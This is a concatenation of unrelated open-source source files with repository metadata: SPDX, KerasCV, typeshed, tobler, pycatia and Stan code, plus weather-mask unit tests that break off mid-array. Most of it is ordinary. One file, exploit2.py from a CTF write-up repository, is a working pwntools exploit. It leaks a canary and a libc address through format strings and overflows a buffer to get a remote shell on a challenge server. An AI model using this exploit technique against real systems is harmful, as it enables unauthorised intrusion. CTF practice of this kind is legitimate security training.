(
package_verification_code_node,
SPDX_NAMESPACE.packageVerificationCodeValue,
Literal(package_verification_code.value),
)
)
for excluded_file in package_verification_code.excluded_files:
graph.add(
(
package_verification_code_node,
SPDX_NAMESPACE.packageVerificationCodeExcludedFile,
Literal(excluded_file),
)
)
graph.add((package_node, SPDX_NAMESPACE.packageVerificationCode, package_verification_code_node))
def add_external_package_ref_to_graph(
external_package_ref: ExternalPackageRef, graph: Graph, package_node: URIRef, doc_namespace: str
):
external_package_ref_node = BNode()
graph.add((external_package_ref_node, RDF.type, SPDX_NAMESPACE.ExternalRef))
graph.add(
(
external_package_ref_node,
SPDX_NAMESPACE.referenceCategory,
SPDX_NAMESPACE[f"referenceCategory_{snake_case_to_camel_case(external_package_ref.category.name)}"],
)
)
if external_package_ref.reference_type in CATEGORY_TO_EXTERNAL_PACKAGE_REF_TYPES[external_package_ref.category]:
graph.add(
(
external_package_ref_node,
SPDX_NAMESPACE.referenceType,
REFERENCE_NAMESPACE[external_package_ref.reference_type],
)
)
else:
graph.add(
(
external_package_ref_node,
SPDX_NAMESPACE.referenceType,
URIRef(f"{doc_namespace}#{external_package_ref.reference_type}"),
)
)
graph.add((external_package_ref_node, SPDX_NAMESPACE.referenceLocator, Literal(external_package_ref.locator)))
if external_package_ref.comment:
graph.add((external_package_ref_node, RDFS.comment, Literal(external_package_ref.comment)))
graph.add((package_node, SPDX_NAMESPACE.externalRef, external_package_ref_node))
|
687cf1f0caea68ccd69a53deb299a9f2b19997d2
|
71fb04f723b46a1bf45295be239bcec25e07f98c
|
/keras_cv/models/object_detection/yolo_v8/yolo_v8_detector_presets.py
|
dfbbe512c102b388420e62aacb7edd52b0399b0a
|
[
"Apache-2.0"
] |
permissive
|
keras-team/keras-cv
|
9bca4479474e853ec3a1c541b8be20fea2447a1a
|
e83f229f1b7b847cd712d5cd4810097d3e06d14e
|
refs/heads/master
| 2023-08-31T10:22:08.406394
| 2023-08-30T20:24:57
| 2023-08-30T20:24:57
| 265,079,853
| 818
| 287
|
NOASSERTION
| 2023-09-12T16:49:01
| 2020-05-18T22:39:21
|
Python
|
UTF-8
|
Python
| false
| false
| 1,598
|
py
|
yolo_v8_detector_presets.py
|
# Copyright 2023 The KerasCV Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""YOLOv8 Task presets."""
from keras_cv.models.object_detection.yolo_v8 import yolo_v8_backbone_presets
yolo_v8_detector_presets = {
"yolo_v8_m_pascalvoc": {
"metadata": {
"description": (
"YOLOV8-M pretrained on PascalVOC 2012 object detection task, "
"which consists of 20 classes. This model achieves a final MaP "
"of 0.45 on the evaluation set."
),
"params": 25901004,
"official_name": "YOLOV8Detector",
"path": "yolo_v8_detector",
},
"config": {
"backbone": yolo_v8_backbone_presets.backbone_presets[
"yolo_v8_m_backbone"
],
"num_classes": 20,
"fpn_depth": 2,
},
"weights_url": "https://storage.googleapis.com/keras-cv/models/yolov8/pascal_voc/yolov8_m_v1.h5", # noqa: E501
"weights_hash": "2891fbd66f71e0b9da0cb02ef3afbccb819e1b8f18204157f643f4ec058a71a8", # noqa: E501
},
}
|
51de2408a1baff1a47719579366ccd169a70f12e
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/helpers/typeshed/stdlib/asyncio/base_tasks.pyi
|
42e952ffacaf0e6b7b52d0f1664c6e44f6fc10ce
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 404
|
pyi
|
base_tasks.pyi
|
from _typeshed import StrOrBytesPath
from types import FrameType
from typing import Any
from . import tasks
def _task_repr_info(task: tasks.Task[Any]) -> list[str]: ... # undocumented
def _task_get_stack(task: tasks.Task[Any], limit: int | None) -> list[FrameType]: ... # undocumented
def _task_print_stack(task: tasks.Task[Any], limit: int | None, file: StrOrBytesPath) -> None: ... # undocumented
|
76e768bbb618d3c9c6e6fb00dcc5f3d33955fdde
|
24db6985a016c3e4767c95ca51190e659d0847cd
|
/cyberapocalypsectf2021/harvester/exploit2.py
|
f8b4a1f3d7dae7216b0e18cc9c46d0297c23bb3d
|
[
"MIT"
] |
permissive
|
datajerk/ctf-write-ups
|
463f53db224410a51df481b9e41b7777a09f3e2c
|
c33815911de3f4a66cbafbf5f12d7b57239250d9
|
refs/heads/master
| 2022-09-30T02:29:44.097435
| 2022-09-05T02:16:19
| 2022-09-05T02:16:19
| 204,361,251
| 136
| 36
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,091
|
py
|
exploit2.py
|
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./harvester_no_usleep')
p = remote('46.101.22.121',31051)
libc = ELF('./libc.so.6')
libc.symbols['gadget'] = [0x4f3d5, 0x4f432, 0x10a41c][0]
__libc_start_main_offset = 231
# get canary @11
p.sendlineafter('> ','1')
p.sendlineafter('> ','%11$p')
p.recvuntil('is: ')
canary = int(p.recvuntil('\x1b[1;').strip(b'\x1b[1;').decode(),16)
log.info('canary: ' + hex(canary))
# get libc @21
p.sendlineafter('> ','1')
p.sendlineafter('> ','%21$p')
p.recvuntil('is: ')
__libc_start_main = int(p.recvuntil('\x1b[1;').strip(b'\x1b[1;').decode(),16) - __libc_start_main_offset
log.info('__libc_start_main: ' + hex(__libc_start_main))
libc.address = __libc_start_main - libc.sym.__libc_start_main
log.info('libc.address: ' + hex(libc.address))
# get 21 pies
p.sendlineafter('> ','2')
p.sendlineafter('> ','y')
p.sendlineafter('> ','-11')
# stare
p.sendlineafter('> ','3')
payload = b''
payload += 40 * b'A'
payload += p64(canary)
payload += 8 * b'B'
payload += p64(libc.sym.gadget)
p.sendafter('> ',payload)
p.interactive()
|
d40b8598a73d340dd88b386137a875123a5aa0b0
|
d46db5fee8953104609ac005085040ed344ec876
|
/tobler/model/glm.py
|
8f929ce59f6cf73701df6df4d6a79de5f7b9b938
|
[
"BSD-3-Clause"
] |
permissive
|
pysal/tobler
|
0ebaf4b6d50a89f29df23d78d09e4c56b93546b3
|
ce6fcb900b4290cd7bbec99236dd40a1baa98f0b
|
refs/heads/main
| 2023-09-01T21:19:19.913555
| 2023-08-22T16:09:53
| 2023-08-22T16:09:53
| 202,220,824
| 127
| 24
|
BSD-3-Clause
| 2023-09-11T16:05:34
| 2019-08-13T20:41:42
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 3,742
|
py
|
glm.py
|
"""Model-based methods for areal interpolation."""
import statsmodels.formula.api as smf
from statsmodels.genmod.families import Gaussian, NegativeBinomial, Poisson
from ..util.util import _check_presence_of_crs
from ..dasymetric import _fast_append_profile_in_gdf
import numpy as np
def glm(
source_df=None,
target_df=None,
raster="nlcd_2011",
raster_codes=None,
variable=None,
formula=None,
likelihood="poisson",
force_crs_match=True,
return_model=False,
):
"""Train a generalized linear model to predict polygon attributes based on the collection of pixel values they contain.
Parameters
----------
source_df : geopandas.GeoDataFrame, required
geodataframe containing source original data to be represented by another geometry
target_df : geopandas.GeoDataFrame, required
geodataframe containing target boundaries that will be used to represent the source data
raster : str, required (default="nlcd_2011")
path to raster file that will be used to input data to the regression model.
i.e. a coefficients refer to the relationship between pixel counts and population counts.
Defaults to 2011 NLCD
raster_codes : list, required (default =[21, 22, 23, 24, 41, 42, 52])
list of integers that represent different types of raster cells. If no formula is given,
the model will be fit from a linear combination of the logged count of each cell type
listed here. Defaults to [21, 22, 23, 24, 41, 42, 52] which
are informative land type cells from the NLCD
variable : str, required
name of the variable (column) to be modeled from the `source_df`
formula : str, optional
patsy-style model formula that specifies the model. Raster codes should be prefixed with
"Type_", e.g. `"n_total_pop ~ -1 + np.log1p(Type_21) + np.log1p(Type_22)`
likelihood : str, {'poisson', 'gaussian', 'neg_binomial'} (default = "poisson")
the likelihood function used in the model
force_crs_match : bool
whether to coerce geodataframe and raster to the same CRS
return model : bool
whether to return the fitted model in addition to the interpolated geodataframe.
If true, this will return (geodataframe, model)
Returns
--------
interpolated : geopandas.GeoDataFrame
a new geopandas dataframe with boundaries from `target_df` and modeled attribute
data from the `source_df`. If `return_model` is true, the function will also return
the fitted regression model for further diagnostics
"""
source_df = source_df.copy()
target_df = target_df.copy()
_check_presence_of_crs(source_df)
liks = {"poisson": Poisson, "gaussian": Gaussian, "neg_binomial": NegativeBinomial}
if likelihood not in liks.keys():
raise ValueError(f"likelihood must one of {liks.keys()}")
if not raster_codes:
raster_codes = [21, 22, 23, 24, 41, 42, 52]
raster_codes = ["Type_" + str(i) for i in raster_codes]
if not formula:
formula = (
variable
+ "~ -1 +"
+ "+".join(["np.log1p(" + code + ")" for code in raster_codes])
)
profiled_df = _fast_append_profile_in_gdf(
source_df[[source_df.geometry.name, variable]], raster, force_crs_match
)
results = smf.glm(formula, data=profiled_df, family=liks[likelihood]()).fit()
out = target_df[[target_df.geometry.name]]
temp = _fast_append_profile_in_gdf(
out[[out.geometry.name]], raster, force_crs_match
)
out[variable] = results.predict(temp.drop(columns=[temp.geometry.name]).fillna(0))
if return_model:
return out, results
return out
|
db2f165ce937222951ac08c392c0b7faeb5bc8e4
|
499f5402baed77d000c65f243b457c69dc3d2fe4
|
/pycatia/tps_interfaces/captures.py
|
9386e1dd3f25f2a6551ec03c32c1fe35d994fa0d
|
[
"MIT"
] |
permissive
|
evereux/pycatia
|
416189b34f3c60effea8a76258e36ffc5ae86e22
|
5f5726d5dc66265b3eba8a01910c4aeae424365d
|
refs/heads/master
| 2023-08-21T10:03:41.660445
| 2023-08-09T16:21:10
| 2023-08-09T16:21:10
| 159,069,580
| 141
| 42
|
MIT
| 2023-08-09T11:15:27
| 2018-11-25T20:04:31
|
Python
|
UTF-8
|
Python
| false
| false
| 2,094
|
py
|
captures.py
|
#! usr/bin/python3.9
"""
Module initially auto generated using V5Automation files from CATIA V5 R28 on 2020-09-25 14:34:21.593357
.. warning::
The notes denoted "CAA V5 Visual Basic Help" are to be used as reference only.
They are there as a guide as to how the visual basic / catscript functions work
and thus help debugging in pycatia.
"""
from typing import Iterator
from pycatia.system_interfaces.any_object import AnyObject
from pycatia.system_interfaces.collection import Collection
from pycatia.tps_interfaces.capture import Capture
from pycatia.types.general import cat_variant
class Captures(Collection):
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-09-25 14:34:21.593357)
| System.IUnknown
| System.IDispatch
| System.CATBaseUnknown
| System.CATBaseDispatch
| System.Collection
| Captures
|
| The interface to access a CATIACaptures
"""
def __init__(self, com_object):
super().__init__(com_object)
self.captures = com_object
def item(self, i_index: cat_variant) -> AnyObject:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-09-25 14:34:21.593357))
| o Func Item(CATVariant iIndex) As AnyObject
|
| Retrieve a Capture.
:param CATVariant i_index:
:return: AnyObject
:rtype: AnyObject
"""
return AnyObject(self.captures.Item(i_index))
def __getitem__(self, n: int) -> Capture:
if (n + 1) > self.count:
raise StopIteration
return Capture(self.captures.item(n + 1))
def __iter__(self) -> Iterator[Capture]:
for i in range(self.count):
yield self.child_object(self.com_object.item(i + 1))
def __repr__(self):
return f'Captures(name="{self.name}")'
|
9f096288444857b2856c3ee033c79bd133173362
|
1b90be9561c10508eea59cb36c1f1665d0ef947f
|
/test/varmat_compatibility_summary_test.py
|
3e9fb9082d1cbe76c2b2836da7d100ea76c2d0cc
|
[
"BSD-3-Clause",
"GPL-2.0-only",
"Apache-2.0"
] |
permissive
|
stan-dev/math
|
473e7c1eaf11f84eaf2032c2455e12ba65feef39
|
bdf281f4e7f8034f47974d14dea7f09e600ac02a
|
refs/heads/develop
| 2023-08-31T09:02:59.224115
| 2023-08-29T15:17:01
| 2023-08-29T15:17:01
| 38,388,440
| 732
| 240
|
BSD-3-Clause
| 2023-09-14T19:44:20
| 2015-07-01T18:40:54
|
C++
|
UTF-8
|
Python
| false
| false
| 4,017
|
py
|
varmat_compatibility_summary_test.py
|
from varmat_compatibility_summary import convert_signatures_list_to_functions, select_signatures_matching_functions, remove_signatures_matching_functions, process_results
import unittest
class HelpersTest(unittest.TestCase):
def setUp(self):
self.signatures_list = ["chicken(array[] real) => real", "squirrel(array[] real) => real", "frog(array[] real) => real"]
def test_convert(self):
self.assertSetEqual(set(["chicken", "squirrel", "frog"]), convert_signatures_list_to_functions(self.signatures_list))
def test_select(self):
self.assertSetEqual(set(["chicken(array[] real) => real"]), select_signatures_matching_functions(self.signatures_list, ["chicken"]))
def test_remove(self):
self.assertSetEqual(set(["squirrel(array[] real) => real", "frog(array[] real) => real"]), remove_signatures_matching_functions(self.signatures_list, ["chicken"]))
class ProcessResultsTest(unittest.TestCase):
def setUp(self):
self.results = {
"compatible_signatures" : ["chicken(matrix) => real", "dog(matrix) => real"],
"incompatible_signatures" : ["squirrel(vector) => real", "dog(vector) => real"],
"irrelevant_signatures" : ["chicken(array[] real) => real", "squirrel(array[] real) => real", "frog(array[] real) => real"]
}
def test_which(self):
self.assertSetEqual(set(["chicken(matrix) => real", "dog(matrix) => real"]), process_results(self.results, functions = [], which = "compatible", fully = False, names = False))
self.assertSetEqual(set(["squirrel(vector) => real", "dog(vector) => real"]), process_results(self.results, functions = [], which = "incompatible", fully = False, names = False))
self.assertSetEqual(set(["chicken(array[] real) => real", "squirrel(array[] real) => real", "frog(array[] real) => real"]), process_results(self.results, functions = [], which = "irrelevant", fully = False, names = False))
def test_fully(self):
self.assertSetEqual(set(["chicken(matrix) => real"]), process_results(self.results, functions = [], which = "compatible", fully = True, names = False))
self.assertSetEqual(set(["squirrel(vector) => real"]), process_results(self.results, functions = [], which = "incompatible", fully = True, names = False))
self.assertSetEqual(set(["frog(array[] real) => real"]), process_results(self.results, functions = [], which = "irrelevant", fully = True, names = False))
def test_names(self):
self.assertSetEqual(set(["chicken"]), process_results(self.results, functions = [], which = "compatible", fully = True, names = True))
self.assertSetEqual(set(["squirrel"]), process_results(self.results, functions = [], which = "incompatible", fully = True, names = True))
self.assertSetEqual(set(["frog"]), process_results(self.results, functions = [], which = "irrelevant", fully = True, names = True))
def test_functions(self):
self.assertSetEqual(set(["chicken(matrix) => real"]), process_results(self.results, functions = ["chicken"], which = "compatible", fully = False, names = False))
self.assertSetEqual(set(["squirrel(vector) => real"]), process_results(self.results, functions = ["squirrel"], which = "incompatible", fully = False, names = False))
self.assertSetEqual(set(["frog(array[] real) => real"]), process_results(self.results, functions = ["frog"], which = "irrelevant", fully = False, names = False))
def test_functions_names(self):
self.assertSetEqual(set(["chicken"]), process_results(self.results, functions = ["chicken"], which = "compatible", fully = False, names = True))
self.assertSetEqual(set(["squirrel"]), process_results(self.results, functions = ["squirrel"], which = "incompatible", fully = False, names = True))
self.assertSetEqual(set(["frog"]), process_results(self.results, functions = ["frog"], which = "irrelevant", fully = False, names = True))
if __name__ == '__main__':
unittest.main()
|
378c845527ed1579e91c7197270a543a223c26a0
|
9cc6f9d9eed9aceb5efa56e3b2f364900df11051
|
/improver_tests/utilities/solar/test_DayNightMask.py
|
aee40ea3d9627f8a2245b9cb06eb645b2fc04530
|
[
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
metoppv/improver
|
8553a4f8b93c88291bde0db8f5dfd7b577c04b92
|
cd2c9019944345df1e703bf8f625db537ad9f559
|
refs/heads/master
| 2023-08-30T19:01:04.946698
| 2023-08-25T13:57:20
| 2023-08-25T13:57:20
| 85,334,761
| 101
| 88
|
BSD-3-Clause
| 2023-09-14T19:07:45
| 2017-03-17T16:51:29
|
Python
|
UTF-8
|
Python
| false
| false
| 18,065
|
py
|
test_DayNightMask.py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown copyright. The Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
""" Unit tests for DayNightMask class """
import unittest
from datetime import datetime, timedelta
import cf_units as unit
import iris
import numpy as np
import pytz
from iris.tests import IrisTest
from improver.spotdata.build_spotdata_cube import build_spotdata_cube
from improver.synthetic_data.set_up_test_cubes import (
add_coordinate,
construct_scalar_time_coords,
set_up_variable_cube,
)
from improver.utilities.solar import DayNightMask
ATTRIBUTES = {"institution": "Met Office", "title": "A model field"}
def create_spot_cube(xrange=175, yrange=85):
"""Create a test spot-cube."""
n_sites = 99
latitudes = np.tile(np.linspace(-yrange, yrange, 11), 9)
longitudes = np.repeat(np.linspace(-xrange, xrange, 9), 11)
altitudes = np.zeros(n_sites, dtype=np.float32)
wmo_ids = np.arange(1000, 1000 + n_sites, 1)
data = np.zeros(n_sites)
args = (altitudes, latitudes, longitudes, wmo_ids)
time = datetime(2023, 6, 6, 15)
frt = datetime(2023, 6, 6, 12)
time_bounds = None
time_coords = construct_scalar_time_coords(time, time_bounds, frt)
time_coords = [item[0] for item in time_coords]
spot_cube = build_spotdata_cube(
data, "generic_spot_cube", "1", *args, scalar_coords=time_coords,
)
spot_cube.attributes = ATTRIBUTES
return spot_cube
class Test__init__(IrisTest):
""" Test initialisation of the DayNightMask class """
def test_basic_init(self):
""" Test Initiation of DayNightMask Object"""
plugin = DayNightMask()
self.assertEqual(plugin.day, 1)
self.assertEqual(plugin.night, 0)
self.assertEqual(plugin.irregular, False)
class Test__repr__(IrisTest):
""" Test string representation """
def test_basic_repr(self):
""" Test Representation string of DayNightMask Object"""
expected = "<DayNightMask : Day = 1, Night = 0>"
result = str(DayNightMask())
self.assertEqual(result, expected)
class Test__create_daynight_mask(IrisTest):
""" Test string representation """
def setUp(self):
"""Set up the cube for testing."""
data = np.ones((1, 16, 16), dtype=np.float32)
data[:, 7, 7] = 0.0
self.cube = set_up_variable_cube(
data, "precipitation_amount", "kg m^-2", "equalarea", attributes=ATTRIBUTES
)
self.spot_cube = create_spot_cube()
def test_basic_daynight_mask(self):
""" Test this creates a blank mask cube for gridded data"""
plugin = DayNightMask()
result = plugin._create_daynight_mask(self.cube)
self.assertIsInstance(result, iris.cube.Cube)
self.assertEqual(result.long_name, "day_night_mask")
self.assertEqual(result.units, unit.Unit("1"))
self.assertEqual(result.data.min(), DayNightMask().night)
self.assertEqual(result.data.max(), DayNightMask().night)
self.assertEqual(result.attributes["title"], "Day-Night mask")
self.assertEqual(result.attributes["institution"], "Met Office")
self.assertEqual(result.dtype, np.int32)
self.assertEqual(result.ndim, 2)
self.assertEqual(plugin.irregular, False)
def test_basic_daynight_mask_spot(self):
""" Test this creates a blank mask cube for spot data"""
plugin = DayNightMask()
result = plugin._create_daynight_mask(self.spot_cube)
self.assertIsInstance(result, iris.cube.Cube)
self.assertEqual(result.long_name, "day_night_mask")
self.assertEqual(result.units, unit.Unit("1"))
self.assertEqual(result.data.min(), DayNightMask().night)
self.assertEqual(result.data.max(), DayNightMask().night)
self.assertEqual(result.attributes["title"], "Day-Night mask")
self.assertEqual(result.attributes["institution"], "Met Office")
self.assertEqual(result.dtype, np.int32)
self.assertEqual(result.ndim, 1)
self.assertEqual(plugin.irregular, True)
class Test__daynight_lat_lon_cube(IrisTest):
""" Test string representation """
def setUp(self):
"""Set up the cube for testing."""
data = np.ones((16, 16), dtype=np.float32)
self.cube = set_up_variable_cube(
data,
"precipitation_amount",
"kg m^-2",
grid_spacing=1,
domain_corner=(49, -8),
)
self.cube_360 = set_up_variable_cube(
data,
"precipitation_amount",
"kg m^-2",
grid_spacing=1,
domain_corner=(49, 345),
)
self.spot_cube = create_spot_cube(xrange=10, yrange=10)
def test_basic_lat_lon_cube_gridded(self):
""" Test this create a blank gridded mask cube"""
day_of_year = 10
utc_hour = 12.0
expected_result = np.ones((16, 16))
plugin = DayNightMask()
mask_cube = plugin._create_daynight_mask(self.cube)
result = plugin._daynight_lat_lon_cube(mask_cube, day_of_year, utc_hour)
self.assertIsInstance(result, iris.cube.Cube)
self.assertArrayEqual(result.data, expected_result)
def test_basic_lat_lon_cube_360(self):
""" Test this still works with 360 data"""
day_of_year = 10
utc_hour = 0.0
expected_result = np.zeros((16, 16))
plugin = DayNightMask()
mask_cube_360 = plugin._create_daynight_mask(self.cube_360)
result = plugin._daynight_lat_lon_cube(mask_cube_360, day_of_year, utc_hour)
self.assertIsInstance(result, iris.cube.Cube)
self.assertArrayEqual(result.data, expected_result)
def test_basic_lat_lon_cube_spot(self):
""" Test this create a blank spot mask cube"""
day_of_year = 10
utc_hour = 12.0
expected_result = np.ones((99))
plugin = DayNightMask()
spot_mask_cube = plugin._create_daynight_mask(self.spot_cube)
result = plugin._daynight_lat_lon_cube(spot_mask_cube, day_of_year, utc_hour)
self.assertIsInstance(result, iris.cube.Cube)
self.assertArrayEqual(result.data, expected_result)
class Test_process(IrisTest):
"""Test DayNight Mask."""
def setUp(self):
"""Set up the cubes for testing."""
data = np.ones((16, 16), dtype=np.float32)
data[7, 7] = 0.0
vt = datetime(2015, 11, 20, 8, 0)
self.cube = set_up_variable_cube(
data,
"precipitation_amount",
"kg m^-2",
"equalarea",
grid_spacing=2000,
domain_corner=(0, -30000),
time=vt,
frt=vt,
)
# Cube with time coordinate with bounds. A very small bounding period
# is used to capture day-night variation across the small domain.
bounds = timedelta(minutes=4)
self.cube_time_bounds = set_up_variable_cube(
data,
"precipitation_amount",
"kg m^-2",
"equalarea",
grid_spacing=2000,
domain_corner=(0, -30000),
time=vt + bounds,
time_bounds=(vt, vt + bounds),
frt=vt,
)
# Lat lon cubes
self.cube_lat_lon = set_up_variable_cube(
data,
"precipitation_amount",
"kg m^-2",
grid_spacing=1,
domain_corner=(49, -8),
time=vt,
frt=vt,
)
self.cube_lat_lon_360 = set_up_variable_cube(
data,
"precipitation_amount",
"kg m^-2",
grid_spacing=1,
domain_corner=(49, 345),
time=vt,
frt=vt,
)
self.spot_cube = create_spot_cube()
def test_basic_standard_grid_ccrs(self):
"""Test day_night mask with standard_grid_ccrs projection."""
result = DayNightMask().process(self.cube)
expected_result = np.array(
[
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
)
self.assertArrayEqual(result.data, expected_result)
def test_time_as_dimension(self):
"""Test day_night mask for a cube with multiple times."""
datetime_points = [datetime(2015, 11, 20, 8, 0), datetime(2015, 11, 20, 14, 0)]
cube = add_coordinate(self.cube, datetime_points, "time", is_datetime=True)
result = DayNightMask().process(cube)
expected_result = np.array(
[
[
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
],
np.ones((16, 16)),
]
)
self.assertArrayEqual(result.data, expected_result)
self.assertEqual(result.shape, cube.shape)
def test_basic_lat_lon(self):
"""Test day_night mask with lat lon data."""
result = DayNightMask().process(self.cube_lat_lon)
expected_result = np.array(
[
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
)
self.assertArrayEqual(result.data, expected_result)
def test_basic_lat_lon_360(self):
"""Test day_night mask with lat lon data 360 data."""
result = DayNightMask().process(self.cube_lat_lon_360)
expected_result = np.array(
[
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1],
